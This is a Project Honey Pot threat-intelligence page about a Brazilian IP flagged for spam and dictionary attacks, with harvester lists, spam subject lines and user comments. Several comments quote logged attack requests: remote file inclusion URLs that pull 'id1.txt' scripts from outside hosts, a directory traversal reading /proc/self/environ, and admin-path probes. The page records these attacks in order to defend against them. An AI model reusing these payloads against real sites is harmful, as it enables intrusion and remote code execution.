IP Address Inspector

ATTENTION
  • This IP has not seen any suspicious activity within the last 3 months. This IP is most likely clean and trustworthy now. (This record will remain public for historical purposes, however.)

189.14.103.146 Spam ServerDictionary Attacker

The Project Honey Pot system has detected behavior from the IP address consistent with that of a mail server, dictionary attacker and bad web host. Below we've reported some other data associated with this IP. This interrelated data helps map spammers' networks and aids in law enforcement efforts. If you know something about this IP, please leave a comment.

Lookup IP In: Domain Tools | SpamHaus | Spamcop | SenderBase | Google Groups | Google

Geographic Location Brazil Brazil
Spider First Seen approximately 10 years, 11 months, 2 weeks ago
Spider Last Seen within 10 years, 1 month, 1 week
Spider Sightings 37 visit(s)
User-Agents seen with 8 user-agent(s)

First Received From approximately 12 years, 6 months, 2 weeks ago
Last Received From within 10 years, 3 months, 3 weeks
Number Received 33 email(s) sent from this IP

First Bad Host Appearance approximately 11 years, 5 weeks ago
Last Bad Host Appearance within 11 years, 5 weeks
Bad Host Appearances 99 appearance(s) in spam e-mail or spam post urls

Dictionary Attacks 5 email(s) sent from this IP
First Received From approximately 10 years, 7 months, 3 weeks ago
Last Received From within 10 years, 4 months, 2 weeks

Associated Harvesters
189.15.111.30 | HS Brazil
189.15.99.46 | HS Brazil
189.15.128.115 | HS Brazil
189.15.123.91 | H Brazil
189.15.148.160 | HSD Brazil
189.15.161.153 | HS Brazil
189.15.120.126 | HS Brazil
189.15.136.248 | HS Brazil
189.15.166.191 | HSD Brazil
189.15.65.44 | HS Brazil
189.15.81.84 | HS Brazil
189.15.24.190 | H Brazil
189.15.223.214 | HS Brazil
189.15.139.130 | HSD Brazil
189.15.133.26 | HS Brazil
75.125.52.146 | H United States
189.15.227.223 | HS Brazil
189.27.100.246 | HSD Brazil
IPs In The Neighborhood
189.14.103.147 Brazil
189.14.104.2 | SD Brazil
189.14.104.18 Brazil
189.14.104.50 | S Brazil
189.14.103.146's User Agent Strings
libwww-perl/5.803
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)
Mozilla/5.0
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Example Messages Sent From 189.14.103.146
Subject: Fotos.
Subject: Fotos.
Subject: Fw: Por favor ajudem a encontrar minha filhinha de
Subject: Fw: Fotos.
Subject: Fw: Fotos.
Subject: Cotacao precos.
Subject: Cotacao precos.
Subject: Cotacao de precos.
Subject: Cotacao de precos.
Subject: Cotacao de precos e produtos listados.
Subject: Planilha precos.
Subject: Re: Cota\303\247\303\243o pre\303\247os e produtos.
Subject: Re: Cota\303\247\303\243o de pre\303\247os.
Subject: Fw: Segue em anexo relatorio orcamento.
Subject: Fw: Segue em anexo relatorio orcamento.
Subject: Fw: Segue em anexo relatorio orcamento
Example User Names Used By 189.14.103.146
User-name: leone_j_oroz
User-name: jenisalvage
User-name: jasper.babjeck
User-name: manlikemammano
User-name: rubyhguitian
J.Woody commented...
ATTEMPTED ATTACK ON ADMIN
189.14.103.146 - - [02/Jun/2011:05:56:45 +0100] "GET /product_info.php?products_id=5/admin/file_manager.php/login.php HTTP/1.1" 403 1224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
189.14.103.146 - - [02/Jun/2011:05:56:45 +0100] "GET /admin/file_manager.php/login.php HTTP/1.1" 403 1224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
189.14.103.146 - - [02/Jun/2011:05:59:48 +0100] "GET /product_info.php?products_id=5/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 1224 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
189.14.103.146 - - [02/Jun/2011:05:59:49 +0100] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 1224 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
June 04 2011 07:59 AM

E.Stone commented...
Sat, 19 Mar 2011 08:59:42 -0400
Host: web-srv02.acaonet.com.br
IP: 189.14.103.146
Score: 5
Violation count: 1 INSTA-BANNED
Why blocked: RFI attack/SQL injection (Unprintable ASCII escaping). Null truncation attempt. No known valid perl clients or spiders. Infected machine. INSTA-BAN Bot Detection, INSTA-BAN. Directory traversal attackYou have been instantly banned due to extremely hazardous behavior!
Query: area=../../../../../../../../../../../../../../../proc/self/environ%00
Referer:
User Agent: libwww-perl/5.803
Reconstructed URL: http:// www.mysite.com /?area=../../../../../../../../../../../../../../../proc/self/environ%00
March 19 2011 09:17 AM

K.Penton commented...
Attempt to exploit MODx vulnerability:
[25/Feb/2011:06:42:04 GET /ditto//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.blejtash.com//includes/ID-RFI.txt?? HTTP/1.1
February 25 2011 07:26 PM

R.Rivenell commented...
This site (189.14.103.146) is unfortunately still active: I have not long received an e-mail allegedly from a Brazilian bank asking me to enter the usual details. Of course I don't have a Brazilian bank a/c; it's just mass mailing. The headers as usual supplied the above address.
November 28 2010 03:36 AM

J.Brisebois commented...
On 01/04/10 2:16:27 PM CST the IP 189.14.103.146 requested URI www.grynmoors.org/?page=http://www.youronlive.com/modules/Forums/admin/id1.txt??. They came from [ ] with user agent [Mozilla/5.0 ]. This activity resulted in an automatic and immediate ban via .htaccess.
January 05 2010 01:43 AM

J.Brisebois commented...
On 01/04/10 2:16:27 PM CST the IP 189.14.103.146 requested URI www.grynmoors.org/articles.php%253Fpage%253Dlinks/?page=http://www.youronlive.com/modules/Forums/admin/id1.txt??. They came from [ ] with user agent [Mozilla/5.0 ]. This activity resulted in an automatic and immediate ban via .htaccess.
January 05 2010 01:42 AM

J.Brisebois commented...
Again...

On 01/04/10 2:08:25 PM CST the IP 189.14.103.146 requested URI xxxxx-page.com/?page=http://www.youronlive.com/modules/Forums/admin/id1.txt??. They came from [ ] with user agent [Mozilla/5.0 ]. This activity resulted in an automatic and immediate ban via .htaccess.
January 05 2010 01:34 AM

J.Brisebois commented...
ATTEMPTED ATTACK ON SERVER: Greetings! I caught a douchebag today at 12/21/09 11:44:15 PM CST. I banned IP 189.14.103.146 from the requested URI xxxxxxxxxx.com/errors.php?error=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? They came from referrer [ ] with user agent Mozilla/5.0
December 22 2009 02:05 AM

Page generated on: August 05 2021 05:42:46 PM
byronaldrich156@gmail.com valeriegonzalez749@yahoo.com ceciliaschumacher299@vbwebmail.com ofeliacompton475@outlook.com
do not follow this link

Privacy Policy | Terms of Use | About Project Honey Pot | FAQ | Cloudflare Site Protection | Contact Us

Copyright © 2004–21, Unspam Technologies, Inc. All rights reserved.

Advertisements displayed on this page are not necessarily endorsed by Project Honey Pot

contact | wiki | email